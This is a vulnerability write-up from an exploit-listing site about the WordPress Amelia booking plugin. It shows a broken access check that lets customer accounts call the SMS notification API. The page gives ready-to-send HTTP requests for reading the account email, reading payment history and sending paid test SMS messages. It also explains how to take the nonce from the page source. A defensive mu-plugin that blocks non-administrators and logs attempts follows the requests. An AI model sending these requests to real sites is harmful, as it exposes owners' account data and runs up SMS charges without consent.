## https://sploitus.com/exploit?id=WPEX-ID:0882E5C0-F319-4994-9346-AA18438FDA6A
To get the ameliaNonce, view the page source of the Amelia dashboard while logged in as a customer and look for "wpAmeliaNonce". The nonce only shows that the request originated from the dashboard; it does not prove the caller is an administrator, which is why the customer-level requests below reach the SMS API.
## Get User Info
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 24
{"action":"getUserInfo"}
Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","user":{"email":"redacted@gmail.com","balance":0}}}
## Get Payment History
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 30
{"action":"getPaymentHistory"}
Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","payments":[],"countFiltered":0}}
## Send test notification (costs real money)
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 146
{
"action":"testNotification",
"data":{
"type": "appointment",
"notificationTemplate": 1,
"recipientPhone":"11111111"
}
}
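As a defensive addition that is not part of the original advisory: a hypothetical WordPress must-use plugin that denies the `/notifications/sms` call of the `wpamelia_api` AJAX action to any user without `manage_options` and logs the attempt. It assumes the plugin is dispatched through the `action` and `call` parameters exactly as in the requests above, and that the `admin_init` hook fires before the plugin's own handler (as it does in admin-ajax.php).

```php
<?php
/**
 * Plugin Name: Restrict Amelia SMS API to administrators (hypothetical mu-plugin)
 * Drop into wp-content/mu-plugins/ so it loads before regular plugins.
 */
add_action('admin_init', function () {
    // Only AJAX dispatch is relevant; admin-ajax.php fires admin_init before wp_ajax_{action}.
    if (!wp_doing_ajax()) {
        return;
    }

    // The routed endpoint is chosen by the "action" and "call" parameters seen in the PoC requests.
    $action = isset($_REQUEST['action']) ? (string) $_REQUEST['action'] : '';
    $call   = isset($_GET['call']) ? (string) $_GET['call'] : '';
    if ($action !== 'wpamelia_api' || strpos($call, '/notifications/sms') !== 0) {
        return;
    }

    // A valid ameliaNonce is not a privilege check; require an administrator capability.
    if (current_user_can('manage_options')) {
        return;
    }

    // Record the denied attempt for the SOC; user id 0 means an unauthenticated caller.
    error_log(sprintf(
        'Blocked Amelia SMS API call "%s" by user %d from %s',
        $call,
        get_current_user_id(),
        isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
    ));

    // Stop the request before the plugin's handler can run.
    wp_send_json_error(['message' => 'Forbidden'], 403);
}, 1);
```

Review the PHP error log (or forward it to your SIEM) for the "Blocked Amelia SMS API call" line to see which customer accounts are probing the endpoint.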